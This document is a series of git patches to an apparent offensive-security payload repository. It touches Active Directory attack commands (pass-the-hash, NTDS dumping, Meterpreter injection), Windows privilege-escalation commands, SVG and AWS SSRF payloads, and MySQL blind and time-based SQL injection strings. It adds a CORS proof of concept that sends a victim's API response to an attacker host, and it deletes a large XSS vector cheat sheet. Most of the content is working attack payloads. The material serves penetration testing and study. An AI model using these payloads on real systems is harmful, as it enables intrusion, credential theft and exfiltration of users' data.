(experimental) * [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) * [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) -* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) \ No newline at end of file +* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) From b6697d859570803e55cff6a68d4d6827b2126788 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 15 Aug 2019 18:21:06 +0200 Subject: [PATCH 040/222] SSRF SVG + Windows Token getsystem --- .../Active Directory Attack.md | 8 +++++--- .../Windows - Privilege Escalation.md | 11 +++++++++++ .../Files/ssrf_svg_css_import.svg | 7 +++++++ .../Files/ssrf_svg_css_link.svg | 6 ++++++ .../Files/ssrf_svg_css_xmlstylesheet.svg | 6 ++++++ .../Files/ssrf_svg_image.svg | 4 ++++ .../Files/ssrf_svg_use.svg | 4 ++++ Server Side Request Forgery/README.md | 15 ++++++++++++++- 8 files changed, 57 insertions(+), 4 deletions(-) create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_import.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_link.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_image.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_use.svg diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6dae309e..7a1cfc63 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -55,6 +55,7 @@ crackmapexec smb -M name_module -o VAR=DATA crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares + crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" @@ -170,13 +171,13 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" :warning: If the clock is skewed use `clock-skew.nse` script from `nmap` ```powershell -$ nmap -sV -sC 10.10.10.10 +Linux> $ nmap -sV -sC 10.10.10.10 clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s -$ sudo date -s "14 APR 2015 18:25:16" +Linux> sudo date -s "14 APR 2015 18:25:16" +Windows> net time /domain /set ``` - ### Open Shares ```powershell @@ -230,6 +231,7 @@ Mount a share ```powershell smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw +sudo mount -t cifs -o username=,password= ///Users folder ``` ### GPO - Pivoting with Local Admin & Passwords in SYSVOL diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 357f3c18..12f24dca 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -18,6 +18,7 @@ * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) @@ -662,6 +663,16 @@ Microsoft.Workflow.Compiler.exe tests.xml results.xml ## EoP - Impersonation Privileges +### Meterpreter getsystem and alternatives + +```powershell +meterpreter> getsystem +Tokenvator.exe getsystem cmd.exe +incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe +psexec -s -i cmd.exe +python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc +``` + ### RottenPotato (Token Impersonation) Binary available at : https://github.com/foxglovesec/RottenPotato diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_import.svg b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg new file mode 100644 index 00000000..8c1f4466 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg @@ -0,0 +1,7 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_link.svg b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg new file mode 100644 index 00000000..e9f7d305 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg new file mode 100644 index 00000000..a29199af --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_image.svg b/Server Side Request Forgery/Files/ssrf_svg_image.svg new file mode 100644 index 00000000..9d3b717e --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_image.svg @@ -0,0 +1,4 @@ + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_use.svg b/Server Side Request Forgery/Files/ssrf_svg_use.svg new file mode 100644 index 00000000..14040b20 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_use.svg @@ -0,0 +1,4 @@ + + + \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 9a7032a7..1f0368a3 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -32,6 +32,7 @@ * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk) + * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda) * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud) * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean) * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud) @@ -441,6 +442,17 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. +### SSRF URL for AWS Lambda + +AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment. + +```powershell +http://localhost:9001/2018-06-01/runtime/invocation/next +$ curl "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" +``` + +Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next + ### SSRF URL for Google Cloud Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" @@ -631,4 +643,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) -- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) \ No newline at end of file +- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) +- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) \ No newline at end of file From 4a176615feea0fa485775cb84ce137a07efdba72 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 18 Aug 2019 12:08:51 +0200 Subject: [PATCH 041/222] CORS Misconfiguration --- AWS Amazon Bucket S3/README.md | 3 +- CORS Misconfiguration/README.md | 90 ++ .../Active Directory Attack.md | 1 + SQL Injection/MySQL Injection.md | 50 +- Web Sockets/README.md | 2 - XSS Injection/Files/XML_XSS_cheatsheet.html | 1307 ----------------- XSS Injection/Files/xss.url.url | 3 + 7 files changed, 136 insertions(+), 1320 deletions(-) create mode 100644 CORS Misconfiguration/README.md delete mode 100644 XSS Injection/Files/XML_XSS_cheatsheet.html create mode 100644 XSS Injection/Files/xss.url.url diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 7d99d780..98042560 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -219,4 +219,5 @@ pip install -r requirements.txt * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) * [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/) -* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/) \ No newline at end of file +* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/) +* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf) \ No newline at end of file diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md new file mode 100644 index 00000000..dcf5bfc2 --- /dev/null +++ b/CORS Misconfiguration/README.md @@ -0,0 +1,90 @@ +# CORS Misconfiguration + +> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. + +## Summary + +* [Prerequisites](#prerequisites) +* [Exploitation](#exploitation) +* [References](#references) + +## Prerequisites + +* BURP HEADER> `Origin: https://evil.com` +* VICTIM HEADER> `Access-Control-Allow-Credential: true` +* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` + +## Exploitation + +Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. + +### Vulnerable example + +```powershell +GET /endpoint HTTP/1.1 +Host: victim.example.com +Origin: https://evil.com +Cookie: sessionid=... + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://evil.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} +``` + +### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://victim.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +or + +```html + + +

CORS PoC

+
+ +
+ + + +``` + +## Bug Bounty reports + +* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) +* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) +* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) +* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) +* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) + +## References + +* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) +* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) +* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7a1cfc63..91056a72 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -375,6 +375,7 @@ CrackMapExec module ```powershell cme smb 10.10.0.202 -u username -p password --ntds vss +cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default ``` ### Password in AD User comment diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 22c3b538..b7be9050 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -18,6 +18,8 @@ * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) + * [Using SLEEP in a subselect](#using-asleep-in-a-subselect) + * [Using conditional statements](#using-conditional-statements) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Current queries](#mysql-current-queries) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) @@ -148,11 +150,11 @@ Shorter to read: Works with `MySQL >= 5.1` ```sql -AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- +?id=1 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- +?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- +?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))-- +?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))-- +?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` ## MYSQL Blind @@ -165,6 +167,8 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126) ?id=1 and left(version(),1)=4 ?id=1 and ascii(lower(substr(Version(),1,1)))=51 ?id=1 and (select mid(version(),1,1)=4) +?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A' +?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' ``` ### MYSQL Blind using a conditional statement @@ -204,17 +208,42 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l'; ## MYSQL Time Based +The following SQL codes will delay the output from MySQL. + ```sql +BENCHMARK(40000000,SHA1(1337))+ '%2Bbenchmark(3200,SHA1(1))%2B' -' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2 - AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 RLIKE SLEEP([SLEEPTIME]) OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) +``` -?id=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) -- -?id=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) -- +### Using SLEEP in a subselect + +```powershell +1 and (select sleep(10) from dual where database() like '%')# +1 and (select sleep(10) from dual where database() like '___')# +1 and (select sleep(10) from dual where database() like '____')# +1 and (select sleep(10) from dual where database() like '_____')# +1 and (select sleep(10) from dual where database() like 'a____')# +... +1 and (select sleep(10) from dual where database() like 's____')# +1 and (select sleep(10) from dual where database() like 'sa___')# +... +1 and (select sleep(10) from dual where database() like 'sw___')# +1 and (select sleep(10) from dual where database() like 'swa__')# +1 and (select sleep(10) from dual where database() like 'swb__')# +1 and (select sleep(10) from dual where database() like 'swi__')# +... +1 and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')# +``` + +### Using conditional statements + +```sql +?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) -- +?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) -- +?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2 ``` ## MYSQL DIOS - Dump in One Shot @@ -324,4 +353,5 @@ load data infile '\\\\error\\abc' into table database.table_name; - [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/) - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123) - [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) -- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) \ No newline at end of file +- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) +- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) \ No newline at end of file diff --git a/Web Sockets/README.md b/Web Sockets/README.md index 12f1e015..be396b89 100644 --- a/Web Sockets/README.md +++ b/Web Sockets/README.md @@ -2,8 +2,6 @@ > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server - - ## Summary * [Tools](#tools) diff --git a/XSS Injection/Files/XML_XSS_cheatsheet.html b/XSS Injection/Files/XML_XSS_cheatsheet.html deleted file mode 100644 index df741b6d..00000000 --- a/XSS Injection/Files/XML_XSS_cheatsheet.html +++ /dev/null @@ -1,1307 +0,0 @@ - - - - XSS Locator - ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} - - Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - XSS Quick Test - '';!--"<XSS>=&{()} - If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - SCRIPT w/Alert() - <SCRIPT>alert('XSS')</SCRIPT> - Basic injection attack - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - SCRIPT w/Source File - <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> - No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - SCRIPT w/Char Code - <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> - Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - BASE - <BASE HREF="javascript:alert('XSS');//"> - Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - BGSOUND - <BGSOUND SRC="javascript:alert('XSS');"> - BGSOUND - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - BODY background-image - <BODY BACKGROUND="javascript:alert('XSS');"> - BODY image - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - BODY ONLOAD - <BODY ONLOAD=alert('XSS')> - BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - DIV background-image 1 - <DIV STYLE="background-image: url(javascript:alert('XSS'))"> - Div background-image - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - DIV background-image 2 - <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> - Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279) - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - DIV expression - <DIV STYLE="width: expression(alert('XSS'));"> - Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression" - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - FRAME - <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> - Frame (Frames have the same sorts of XSS problems as iframes). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IFRAME - <IFRAME SRC="javascript:alert('XSS');"></IFRAME> - Iframe (If iframes are allowed there are a lot of other XSS problems as well). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - INPUT Image - <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> - INPUT Image - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG w/JavaScript Directive - <IMG SRC="javascript:alert('XSS');"> - Image XSS using the JavaScript directive. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG No Quotes/Semicolon - <IMG SRC=javascript:alert('XSS')> - No quotes and no semicolon - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG Dynsrc - <IMG DYNSRC="javascript:alert('XSS');"> - IMG Dynsrc - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - IMG Lowsrc - <IMG LOWSRC="javascript:alert('XSS');"> - IMG Lowsrc - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - IMG Embedded commands 1 - <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> - This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG Embedded commands 2 - Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser - IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this). - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - IMG STYLE w/expression - exp/*<XSS STYLE='no\xss:noxss("*//*"); -xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> - - IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop). - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - List-style-image - <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS - - Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - IMG w/VBscript - <IMG SRC='vbscript:msgbox("XSS")'> - VBscript in an image - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] - - - - LAYER - <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> - Layer (Older Netscape only) - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - Livescript - <IMG SRC="livescript:[code]"> - Livescript (Older Netscape only) - - - Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] - - - - US-ASCII encoding - %BCscript%BEalert(%A2XSS%A2)%BC/script%BE - Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span 